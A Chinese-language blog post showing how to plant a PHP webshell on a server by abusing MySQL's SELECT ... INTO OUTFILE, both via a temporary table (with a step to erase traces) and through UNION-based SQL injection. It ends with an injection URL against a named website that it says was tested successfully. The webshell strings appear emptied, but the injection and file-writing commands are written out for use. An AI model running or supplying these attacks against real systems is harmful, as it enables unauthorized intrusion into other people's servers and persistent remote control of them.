MySQL导出一句话拿WebShell的办法

文章中用到的SQL语句大体如下(命令行或者其它能执行SQL命令的shell都行):
Drop TABLE IF EXISTS temp; //如果存在temp就删掉
Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段
Insert INTO temp (cmd) VALUES(”); //把一句话木马插入到temp表
Select cmd from temp into out file ‘F:/wwwroot/eval.php’; //查询temp表中的一句话并把结果导入到eval.php
Drop TABLE IF EXISTS temp; //删除temp(擦屁股o(∩_∩)o…)
这几句SQL很简单,我做了简单的注释。
不过想想我们在测试PHP的SQL漏洞的时候经常用如下的语句:
/**/UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12/*
然后返回的页面中可能会出现1~12之间的数字。这里加入数字3显示出来了。
如果我们把上面这句改成/**/UNION SELECT 1,2,’zerosoul’,4,5,6,7,8,9,10,11,12/*,则返回页面上次显示3的地方会显示zerosoul。
也就是说如果我们的select语句后面不带from table语句的话,我们说查询的数字或字符会直接返回到查询结果里。
既然这样,我们为何还要那么麻烦去建一个表,先导入数据,再导出这样折腾呢。
有了这个思路,上面那一大段到出一句话的SQL代码可以直接简化到一句:
Select ” into outfile ‘F:/wwwroot/eval.php’;
这样做不但简单明了,而且避免了误删别人的数据。
效果图如下:


补充:加个测试成功的注入URL:
http://www.7747.net/news.php?NewsID=-1 union Select ‘‘,2 into outfile ‘D:/wwwroot/eval.php’/*

发表评论

电子邮件地址不会被公开。 必填项已用*标注